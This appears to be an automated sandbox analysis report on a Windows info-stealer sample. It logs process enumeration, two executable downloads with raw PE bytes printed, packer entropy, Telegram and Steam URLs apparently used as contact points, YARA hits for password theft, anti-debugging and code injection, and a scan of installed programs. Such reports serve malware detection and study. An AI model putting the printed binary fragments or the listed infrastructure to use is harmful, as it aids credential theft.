Process32NextW April 21, 2023, 5:57 p.m.	snapshot_handle: 0x00000578 process_name: svchost.exe process_identifier: 1120	1	1
Process32NextW April 21, 2023, 5:57 p.m.	snapshot_handle: 0x00000578 process_name: dwm.exe process_identifier: 1192	1	1
Process32NextW April 21, 2023, 5:57 p.m.	snapshot_handle: 0x00000578 process_name: explorer.exe process_identifier: 1236	1	1
Process32NextW April 21, 2023, 5:57 p.m.	snapshot_handle: 0x00000578 process_name: svchost.exe process_identifier: 1744	1	1
Process32NextW April 21, 2023, 5:57 p.m.	snapshot_handle: 0x00000578 process_name: pw.exe process_identifier: 1888	1	1
Process32NextW April 21, 2023, 5:57 p.m.	snapshot_handle: 0x00000578 process_name: SearchIndexer.exe process_identifier: 1652	1	1
Process32NextW April 21, 2023, 5:57 p.m.	snapshot_handle: 0x00000578 process_name: pw.exe process_identifier: 1448	1	1
Process32NextW April 21, 2023, 5:57 p.m.	snapshot_handle: 0x00000578 process_name: taskhost.exe process_identifier: 1572	1	1
Process32NextW April 21, 2023, 5:57 p.m.	snapshot_handle: 0x00000578 process_name: SearchProtocolHost.exe process_identifier: 880	1	1
Process32NextW April 21, 2023, 5:57 p.m.	snapshot_handle: 0x00000578 process_name: SearchFilterHost.exe process_identifier: 1020	1	1
Process32NextW April 21, 2023, 5:57 p.m.	snapshot_handle: 0x00000578 process_name: buildz.exe process_identifier: 2416	1	1
Process32NextW April 21, 2023, 5:57 p.m.	snapshot_handle: 0x00000578 process_name: svchost.exe process_identifier: 2652	1	1
Process32NextW April 21, 2023, 5:57 p.m.	snapshot_handle: 0x00000578 process_name: mscorsvw.exe process_identifier: 2680	1	1
Process32NextW April 21, 2023, 5:57 p.m.	snapshot_handle: 0x00000578 process_name: mscorsvw.exe process_identifier: 2724	1	1
Process32NextW April 21, 2023, 5:57 p.m.	snapshot_handle: 0x00000578 process_name: sppsvc.exe process_identifier: 2772	1	1
Process32NextW April 21, 2023, 5:57 p.m.	snapshot_handle: 0x00000578 process_name: build2.exe process_identifier: 2932	1	1
Process32NextW April 21, 2023, 5:57 p.m.	snapshot_handle: 0x00000578 process_name: cmd.exe process_identifier: 2148	1	1
Process32NextW April 21, 2023, 5:57 p.m.	snapshot_handle: 0x00000578 process_name: conhost.exe process_identifier: 2164	1	1
Process32NextW April 21, 2023, 5:57 p.m.	snapshot_handle: 0x00000578 process_name: pw.exe process_identifier: 2128	1	1
Process32NextW April 21, 2023, 5:57 p.m.	snapshot_handle: 0x00000578 process_name: WmiPrvSE.exe process_identifier: 2040	1	1
Process32NextW April 21, 2023, 5:57 p.m.	snapshot_handle: 0x00000578 process_name: #⌀ᛸǰŐǰ䌔 process_identifier: 32505856		0

An executable file was downloaded by the process buildz.exe (2 events)

Time & API	Arguments	Status	Return	Repeated
InternetReadFile April 21, 2023, 5:57 p.m.	buffer: MZÿÿ¸@àº´ Í!¸LÍ!This program cannot be run in DOS mode. $Lø](3{3{3{Ë·{3{Ë¦{3{Ë°{W3{/_H{3{2{r3{Ë¹{ 3{Ë§{ 3{Ë¢{ 3{Rich3{PELÐÌ±bà øÌµB@à±$ýxà HÜÀÀ ÐÈ,@.text¼öø `.dataøÏü@À.rsrcHÜà Þ@@.relocÀô@B¦rÿÿÿ®ÿ¼ÿÐÿÞÿöÿ2F\l¬¾ÎÞTÿ0@Zh\|²Êâô 4Bð4ÿ°ô .:Rjt ¬ºÄÔêþ.L`lx ¬¼Òì4N`n¤ºÔäô0HZh\|fxÚÀI@@³@Q´@cv@Y÷!dM(-(!bad allocation-@®?@¡?@Unknown exception-@3@@ð? !"#$%&'()+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{\|}~=EncodePointerKERNEL32.DLLDecodePointerFlsFreeFlsSetValueFlsGetValueFlsAllocjW@ W@ W@ÿÿÿÿÿÿïÀ@ð_nextafter_logb_yn_y1_y0frexpfmod_hypot_cabsldexpmodffabsfloorceiltancossinsqrtatan2atanacosasintanhcoshsinhlog10logpowexpCorExitProcessmscoree.dllruntime error TLOSS error SING error DOMAIN error R6034 An application has made an attempt to load the C runtime library incorrectly. Please contact the application's support team for more information. R6033 - Attempt to use MSIL code from this assembly during native code initialization This indicates a bug in your application. It is most likely the result of calling an MSIL-compiled (/clr) function from a native constructor or from DllMain. R6032 - not enough space for locale information R6031 - Attempt to initialize the CRT more than once. This indicates a bug in your application. R6030 - CRT not initialized R6028 - unable to initialize heap R6027 - not enough space for lowio initialization R6026 - not enough space for stdio initialization R6025 - pure virtual function call R6024 - not enough space for _onexit/atexit table R6019 - unable to open console device R6018 - unexpected heap error R6017 - unexpected multithread lock error R6016 - not enough space for thread data This application has requested the Runtime to terminate it in an unusual way. Please contact the application's support team for more information. R6009 - not enough space for environment R6008 - not enough space for arguments R6002 - floating point support not loaded Microsoft Visual C++ Runtime Library ...<program name unknown>Runtime Error! Program: ÀÀÀÀÀÀÀÀÀÀ ((((( H request_handle: 0x00cc0010	1	1	0
InternetReadFile April 21, 2023, 5:57 p.m.	buffer: MZÿÿ¸@Ðº´ Í!¸LÍ!This program cannot be run in DOS mode. $±Àõï®Ïõï®Ïõï®Ï®¯Îðï®Ïõï¯Ïÿï®Ïo§Îðï®Ïo¬Îôï®ÏRichõï®ÏPEL¼aàú0@`@¼:<P,Ð9800.text« `.rdataÞ0@@.data`@@À.reloc,P"@BUììh(6@ÿ0@EüÀTSV50@WhD6@PÿÖhT6@£@@ÿÐhl6@Eøÿ@@h6@Eðÿ@@h6@Øÿ@@h¬6@øÿ@@h6@Eôÿ@@hÄ6@ÿuüÿÖuühÔ6@V£8@@ÿÐhè6@V£@@ÿ8@@hü6@V£D@@ÿ8@@h7@V£$@@ÿ8@@h7@V£<@@ÿ8@@h 7@V£@@ÿ8@@h07@V£4@@ÿ8@@h<7@V£@@ÿ8@@hH7@V£0@@ÿ8@@uøhT7@V£ @@ÿ8@@h\7@V£@@ÿ8@@hd7@V£T@@ÿ8@@hp7@Vÿ8@@h\|7@Vÿ8@@h7@W£X@@ÿ8@@}üh 7@Wÿ8@@h¬7@Wÿ8@@h¼7@Wÿ8@@hÌ7@W£@@@ÿ8@@hÜ7@S£,@@ÿ8@@hð7@Vÿ8@@uôhü7@V£@@ÿ8@@]ðh8@Sÿ8@@h8@S£(@@ÿ8@@h8@Sÿ8@@h$8@V£@@ÿ8@@h48@V£H@@ÿ8@@hH8@V£\@@ÿ8@@hX8@V£@@ÿ8@@hl8@V£P@@ÿ8@@_^£L@@[ÉÃUììðûÿÿVhP3öVÿ@@øýÿÿPVVjVÿ(0@Àxfh\|8@øýÿÿPÿ@@øýÿÿPÿX@@ÀuVøýÿÿPÿD@@h¤8@øýÿÿPÿ@@øýÿÿPðûÿÿPÿT@@Àtøýÿÿè,^ÉÃVøýÿÿPðûÿÿPÿ0@øýÿÿè jÿÿ0@ÌUììXSVWjD_W3ÛE¨SPñÿ(@@jEì}¨SPÿ(@@Ähj@ÿ@@ºÀ8@EüMüè º9@Müè º09@Müèt ÖMüèj º@9@Müè] }üEìPE¨PSShSSSWhH9@ÿ0@ÀuÿtWÿ0@@3Àë)jÿÿuìÿ0@ÿuì50@ÿÖÿuðÿÖÿtWÿ0@@3À@_^[ÉÃUì3ÀÒtúÿÿÿv¸WÀxHÒt+VW}¾þÿÿ+ò+ùÀt·fÀtfÁêuå_^ÒAþEÁ3ÉÒf¸zEÁë Òt3Òf]ÂUìQSVWjl[òùj1Xf9¤Vÿ @@ø"j0Vÿ@@ÀjOVÿ@@ÀuvjIVÿ@@ÀuiSVÿ@@Àu]Vÿ7ÿT@@ØÛtKÓ+ÑúRèºP0@YMüEüèýVÿ @@MüCèë?tÿ7ÿ 0@Eü3À@éjl[j3Xf9ufVÿ @@ø"uZj0Vÿ@@ÀuMjOVÿ@@Àu@jIVÿ@@Àu3SVÿ@@Àu'Vÿ7ÿT@@ØÛtÓ+ÑúRèàº0@éWÿÿÿVÿ @@jcYjb[øu[f9uVf9NuPj1Xf9FuGjO^Sÿ@@Àu4jISÿ@@Àu'Vÿ7ÿT@@ØÛtÓ+ÑúRèvºà0@éíþÿÿjb[Vÿ @@øu^f9uYf~nuRf9^uLj1^Xf9uAjOSÿ@@Àu4jISÿ@@Àu'Vÿ7ÿT@@ØÛtÓ+ÑúRè ºÐ5@éþÿÿf>LuiVÿ @@ø"u]j0Vÿ@@ÀuPjOVÿ@@ÀuCjIVÿ@@jl[Àu6SVÿ@@ÀuVÿ7ÿT@@ØÛtÓ+ÑúRèº81@éþÿÿjl[f>MufVÿ @@ø"uZj0Vÿ@@ÀuMjOVÿ@@Àu@jIVÿ@@Àu3SVÿ@@Àu'Vÿ7ÿT@@ØÛtÓ+ÑúRè+º1@é¢ýÿÿVÿ @@jtYø+ucjlXf9u[f9NuUjcXf9FuLj1^Xf9uAjOSÿ@@Àu4jISÿ@@Àu'Vÿ7ÿT@@ØÛtÓ+ÑúRè¹ºÈ1@é0ýÿÿÎèèÀt'Vÿ7ÿT@@ØÛtÓ+ÑúRèº 2@éþüÿÿÎè{Àt'Vÿ7ÿT@@ØÛtÓ+ÑúRèUºx2@éÌüÿÿÎèðÀt'Vÿ7ÿT@@ØÛtÓ+ÑúRè#º83@éüÿÿÎèYÀt'Vÿ7ÿT@@ØÛtÓ+ÑúRèñºø3@éhüÿÿVÿ @@øguLf>auFjdXf9Fu=f9Fu7f~ru0j1Xf9Fu'Vÿ7ÿT@@ØÛtÓ+ÑúRèº@4@éüÿÿVÿ @@ø;uqf>Aukf~eudf~2u]j0Vÿ@@ÀuPjOVÿ@@ÀuCjIVÿ@@Àu6jlXPVÿ@@Àu'Vÿ7ÿT@@ØÛtÓ+ÑúRèº5@éûÿÿVÿ @@jt[ø#unf9uij1Xf9Fu`j0Vÿ@@ÀuSjOVÿ@@ÀuFjIVÿ@@Àu9jlXPVÿ@@ÀuVÿ7ÿT@@ØÛtÓ+ÑúRè¢º5@éûÿÿjt[Vÿ @@ø#uSf9uNj3Xf9FuEj0Vÿ@@Àu8jOVÿ@@Àu+jIVÿ@@ÀujlXPVÿ@@ÀuVÿ7ÿT@@ØÛu3À_^[ÉÃSVW4UùVjÿ$@@VØWSÿ@@Pÿ@@ÄSÿ4@@jÿH@@Àt ÿ@@Sj ÿP@@ÿL@@Sÿ<@@3ÀëÈÿ_^[ÃV3öVÿH@@ÀtWj ÿ\@@øÿtWÿ@@ðötWÿ4@@ÿL@@_Æ^ÃUììSVWèøôÿÿh00@jjÿ@@@ÿ,@@=·ujÿ0@èA÷ÿÿ}èèÿÿÿ3ÛEüÀPÿ @@p6Pj@Eèÿ@@ÿuüÖEøÈèªøÿÿMü3ö!]ô·ÐfÀ¹Mð·ÂEì·Âø tCº f;Ât9ø t4ø t/ø tEì·ÀÛuÿuèj@ÿ@@MüøEðC3ö·fwFë$Ût 3ÀMø×fw3ÛèøÿÿÿtWÿ0@@MüEô@ request_handle: 0x00cc0010	1	1	0

The binary likely contains encrypted or compressed data indicative of a packer (2 events)

section

{u'size_of_data': u'0x0009b400', u'virtual_address': u'0x00001000', u'entropy': 7.982145687714781, u'name': u'.text', u'virtual_size': u'0x0009b318'}

entropy

7.98214568771

description

A section with a high entropy has been found

entropy

0.850102669405

description

Overall entropy of this PE file is high

Potentially malicious URLs were found in the process memory dump (3 events)

url	http://www.openssl.org/support/faq.html
url	https://t.me/tg_duckworld
url	https://steamcommunity.com/profiles/76561199497218285

Yara rule detected in process memory (50 events)

description	Communication using DGA	rule	Network_DGA
description	Communications over RAW Socket	rule	Network_TCP_Socket
description	Communications use DNS	rule	Network_DNS
description	PWS Memory	rule	Generic_PWS_Memory_Zero
description	Match Windows Http API call	rule	Str_Win32_Http_API
description	Match Windows Inet API call	rule	Str_Win32_Internet_API
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	DebuggerException__SetConsoleCtrl
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep
description	Take ScreenShot	rule	ScreenShot
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep
description	Communication using DGA	rule	Network_DGA
description	Communications over RAW Socket	rule	Network_TCP_Socket
description	Communications use DNS	rule	Network_DNS
description	PWS Memory	rule	Generic_PWS_Memory_Zero
description	Match Windows Http API call	rule	Str_Win32_Http_API
description	Match Windows Inet API call	rule	Str_Win32_Internet_API
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	DebuggerException__SetConsoleCtrl
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep
description	Take ScreenShot	rule	ScreenShot
description	Code injection with CreateRemoteThread in a remote process	rule	Code_injection
description	Win32 PWS Loki	rule	Win32_PWS_Loki_Zero
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep

Queries for potentially installed applications (50 out of 51 events)

Time & API	Arguments	Status
RegOpenKeyExA April 21, 2023, 5:57 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall base_handle: 0x80000002 key_handle: 0x00000578 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall	1
RegOpenKeyExA April 21, 2023, 5:57 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip base_handle: 0x80000002 key_handle: 0x00000588 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip	1
RegOpenKeyExA April 21, 2023, 5:57 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook base_handle: 0x80000002 key_handle: 0x00000588 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook	1
RegOpenKeyExA April 21, 2023, 5:57 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Adobe AIR base_handle: 0x80000002 key_handle: 0x00000588 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Adobe AIR	1
RegOpenKeyExA April 21, 2023, 5:57 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager base_handle: 0x80000002 key_handle: 0x00000588 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager	1
RegOpenKeyExA April 21, 2023, 5:57 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx base_handle: 0x80000002 key_handle: 0x00000588 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx	1
RegOpenKeyExA April 21, 2023, 5:57 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus base_handle: 0x80000002 key_handle: 0x00000588 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus	1
RegOpenKeyExA April 21, 2023, 5:57 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore base_handle: 0x80000002 key_handle: 0x00000588 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore	1
RegOpenKeyExA April 21, 2023, 5:57 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome base_handle: 0x80000002 key_handle: 0x00000588 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome	1
RegOpenKeyExA April 21, 2023, 5:57 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean base_handle: 0x80000002 key_handle: 0x00000588 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean	1
RegOpenKeyExA April 21, 2023, 5:57 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE40 base_handle: 0x80000002 key_handle: 0x00000588 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE40	1
RegOpenKeyExA April 21, 2023, 5:57 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data base_handle: 0x80000002 key_handle: 0x00000588 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data	1
RegOpenKeyExA April 21, 2023, 5:57 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX base_handle: 0x80000002 key_handle: 0x00000588 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX	1
RegOpenKeyExA April 21, 2023, 5:57 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IEData base_handle: 0x80000002 key_handle: 0x00000588 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IEData	1
RegOpenKeyExA April 21, 2023, 5:57 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack base_handle: 0x80000002 key_handle: 0x00000588 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack	1
RegOpenKeyExA April 21, 2023, 5:57 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Thunderbird 78.4.0 (x86 ko) base_handle: 0x80000002 key_handle: 0x00000588 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Thunderbird 78.4.0 (x86 ko)	1
RegOpenKeyExA April 21, 2023, 5:57 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Office15.PROPLUSR base_handle: 0x80000002 key_handle: 0x00000588 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Office15.PROPLUSR	1
RegOpenKeyExA April 21, 2023, 5:57 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent base_handle: 0x80000002 key_handle: 0x00000588 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent	1
RegOpenKeyExA April 21, 2023, 5:57 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WIC base_handle: 0x80000002 key_handle: 0x00000588 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WIC	1
RegOpenKeyExA April 21, 2023, 5:57 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{00203668-8170-44A0-BE44-B632FA4D780F} base_handle: 0x80000002 key_handle: 0x00000588 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{00203668-8170-44A0-BE44-B632FA4D780F}	1
RegOpenKeyExA April 21, 2023, 5:57 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{01B845D4-B73E-4CF7-A377-94BC7BB4F77B} base_handle: 0x80000002 key_handle: 0x00000588 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{01B845D4-B73E-4CF7-A377-94BC7BB4F77B}	1
RegOpenKeyExA April 21, 2023, 5:57 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D91F7DA-F517-4727-9E62-B7EA978BE980} base_handle: 0x80000002 key_handle: 0x00000588 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D91F7DA-F517-4727-9E62-B7EA978BE980}	1
RegOpenKeyExA April 21, 2023, 5:57 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{26A24AE4-039D-4CA4-87B4-2F32180131F0} base_handle: 0x80000002 key_handle: 0x00000588 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{26A24AE4-039D-4CA4-87B4-2F32180131F0}	1
RegOpenKeyExA April 21, 2023, 5:57 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{4A03706F-666A-4037-7777-5F2748764D10} base_handle: 0x80000002 key_handle: 0x00000588 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{4A03706F-666A-4037-7777-5F2748764D10}	1
RegOpenKeyExA April 21, 2023, 5:57 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA} base_handle: 0x80000002 key_handle: 0x00000588 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}	1
RegOpenKeyExA April 21, 2023, 5:57 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0015-0409-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x00000588 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0015-0409-0000-0000000FF1CE}	1
RegOpenKeyExA April 21, 2023, 5:57 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0016-0409-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x00000588 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0016-0409-0000-0000000FF1CE}	1
RegOpenKeyExA April 21, 2023, 5:57 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0018-0409-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x00000588 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0018-0409-0000-0000000FF1CE}	1
RegOpenKeyExA April 21, 2023, 5:57 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0019-0409-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x00000588 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0019-0409-0000-0000000FF1CE}	1
RegOpenKeyExA April 21, 2023, 5:57 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001A-0409-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x00000588 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001A-0409-0000-0000000FF1CE}	1
RegOpenKeyExA April 21, 2023, 5:57 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001B-0409-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x00000588 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001B-0409-0000-0000000FF1CE}	1
RegOpenKeyExA April 21, 2023, 5:57 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001F-0409-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x00000588 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001F-0409-0000-0000000FF1CE}	1
RegOpenKeyExA April 21, 2023, 5:57 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001F-040C-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x00000588 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001F-040C-0000-0000000FF1CE}	1
RegOpenKeyExA April 21, 2023, 5:57 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001F-0C0A-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x00000588 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001F-0C0A-0000-0000000FF1CE}	1
RegOpenKeyExA April 21, 2023, 5:57 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-002C-0409-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x00000588 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-002C-0409-0000-0000000FF1CE}	1
RegOpenKeyExA April 21, 2023, 5:57 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0044-0409-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x00000588 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0044-0409-0000-0000000FF1CE}	1
RegOpenKeyExA April 21, 2023, 5:57 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-006E-0409-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x00000588 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-006E-0409-0000-0000000FF1CE}	1
RegOpenKeyExA April 21, 2023, 5:57 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0090-0409-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x00000588 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0090-0409-0000-0000000FF1CE}	1
RegOpenKeyExA April 21, 2023, 5:57 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00A1-0409-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x00000588 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00A1-0409-0000-0000000FF1CE}	1
RegOpenKeyExA April 21, 2023, 5:57 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00BA-0409-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x00000588 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00BA-0409-0000-0000000FF1CE}	1
RegOpenKeyExA April 21, 2023, 5:57 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00E1-0409-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x00000588 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00E1-0409-0000-0000000FF1CE}	1
